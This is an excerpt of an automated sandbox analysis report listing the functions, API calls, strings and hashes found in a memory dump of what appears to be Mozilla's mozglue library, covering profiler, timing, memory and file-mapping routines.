??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6757BC
GetTickCount64.KERNEL32 ref: 6C6758CB
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6758F3
__aulldiv.LIBCMT ref: 6C675945
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6759B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C6DF638,?,?,?,?), ref: 6C6759E9

Strings

MOZ_APP_RESTART, xrefs: 6C6756CC

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction ID: 8a5d3d28f3501d48136d047c39752d816cf1a815167c03ec0a4cbd8a9897a4dd
Opcode Fuzzy Hash: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction Fuzzy Hash: 05C17C31A083809FDB15CF29C48066AF7F1BFCA714F158A5DF8C497A60D730A985CB9A

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C698ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C65EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C69B392,?,?,00000001), ref: 6C6991F4

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Strings

name, xrefs: 6C698F16
timeline-ipc, xrefs: 6C699096
marker-table, xrefs: 6C69906C
timeline-overview, xrefs: 6C69907A
timeline-fileio, xrefs: 6C6990A4
timeline-memory, xrefs: 6C699088
stack-chart, xrefs: 6C6990B2
marker-chart, xrefs: 6C69905E
data, xrefs: 6C6990E8

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction ID: e91fcf3a85a4a0ae094e2106f39310f51662bf5ea7707ab1be9b0a83cbe8eee1
Opcode Fuzzy Hash: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction Fuzzy Hash: 55B1A3B0B0120A9BDF04CF95C4917EEBBB5EF85318F204419D506ABF80D771A955CBEA

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

0, xrefs: 6C67D30A
(null), xrefs: 6C67C596

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C653508
kernel32.dll, xrefs: 6C6534EA

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C669620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

NtMapViewOfSection, xrefs: 6C669701
ntdll.dll, xrefs: 6C6696E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
MapViewOfFileNuma2, xrefs: 6C6697B1

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction ID: c58beb77730c3bb50b81c3ab3c95484078194ae74635b95675cd758bd60d9ed7
Opcode Fuzzy Hash: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction Fuzzy Hash: 38418F757002069BDF00CFA7E8D4AD67BB4EB4A768F014529ED1597B80D730B805CFAA

Function 6C663E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C663EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C663FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6640A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C664134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664157

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: f247eb4cf49074cd7f41e602e599435642a9b1894c5ac81416b866b1157663d0
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 47A181B1A00215CFDB40CF6AC880769B7B5FF49308F2541A9D909AFB42D771E886CBA5

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C6ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6ADDCF

Part of subcall function 6C68FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C68FA4B

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE0D
free.MOZGLUE(00000000), ref: 6C6ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF32

Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADB86
Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF65
free.MOZGLUE(?), ref: 6C6ADF80

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction ID: 0ac89ea29ca3db6d5035dcbc7cb8b3ff9466a922f856cee50f87de06b4473153
Opcode Fuzzy Hash: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction Fuzzy Hash: 4551A1726016019BD7219BA9C8806EFB3B2BF96308F95051CDD5A53B00DB31BD1BCB9E

Function 6C6B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DC9
std::_Facet_Register.LIBCPMT ref: 6C6B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E45

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction ID: d43d3134bb9ef4e9c4d1c2bb39eb2cd6776b1883bcd6658d4225881a6cacb5f0
Opcode Fuzzy Hash: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction Fuzzy Hash: 08417C307002049FDB10DFA6C8D8AAE77F6EF89314F144169E506AB791EB30A915CB69

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8
<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
